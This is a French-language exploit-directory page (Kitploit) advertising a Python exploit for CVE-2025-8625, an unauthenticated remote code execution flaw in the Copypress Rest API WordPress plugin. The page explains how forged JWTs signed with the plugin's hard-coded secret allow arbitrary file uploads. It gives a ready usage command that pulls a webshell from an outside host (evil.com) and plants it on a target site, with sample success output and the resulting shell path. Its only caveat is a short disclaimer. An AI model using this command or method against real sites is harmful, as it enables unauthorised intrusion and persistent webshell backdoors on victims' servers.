Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8625 — Copypress Rest API 1.1 - 1.2 - Absence de secret JWT configurable et de validation du type de fichier menant à une exécution de code à distance non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-8625
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubnxploited/cve-2025-8625

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Absence de secret JWT configurable et de validation du type de fichier menant à une exécution de code à distance non authentifiée

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8625

Copypress Rest API 1.1 - 1.2 - Absence de secret JWT configurable et validation de type de fichier manquante menant à une exécution de code à distance non authentifiée

🛡️ Exploit RCE Copypress Rest API 1.1 - 1.2

📝 Description

Le plugin Copypress Rest API pour WordPress (versions 1.1 à 1.2) est vulnérable à une exécution de code à distance via la fonction copyreap_handle_image().
Le plugin utilise une clé de signature JWT codée en dur lorsqu'aucun secret n'est défini et ne valide pas les types de fichiers, ce qui permet à des attaquants non authentifiés de forger des jetons et de téléverser des fichiers arbitraires (tels que des shells PHP) via le point de terminaison du gestionnaire d'images.

  • CVE : CVE-2025-8625
  • CVSS : 9.8 (Critique)

🚀 Présentation du script

Nom du script : CVE-2025-8625.py
Ce script Python automatise l'exploitation de la vulnérabilité, vous permettant de générer un JWT valide, d'envoyer une requête spécialement conçue et de téléverser un fichier malveillant (webshell) sur le site WordPress vulnérable.


⚙️ Utilisation

root@kitploit:~
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
  • -u / --url : URL du site WordPress cible
  • -shell / --shell : Lien direct vers votre webshell ou fichier PHP malveillant

Exemple de sortie :

root@kitploit:~
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.

🏆 Fonctionnalités

  • Génère un JWT valide en utilisant le secret codé en dur du plugin
  • Contourne l'authentification pour téléverser des fichiers arbitraires
  • Fournit une sortie claire pour le succès/échec de l'exploitation
  • Interface en ligne de commande simple

📂 Emplacement du téléversement du shell

Shell téléversé avec succès ! 🎉
Exemple de chemin du shell :

root@kitploit:~
https://target.com/wp-content/uploads/2025/10/shell.php

⚠️ Avertissement

Cet outil est destiné uniquement à des tests de pénétration éducatifs et autorisés.
Toute utilisation contre des cibles sans autorisation explicite est illégale.


Par : Nxploited (Khaled Alenazi)

Télécharger l’outil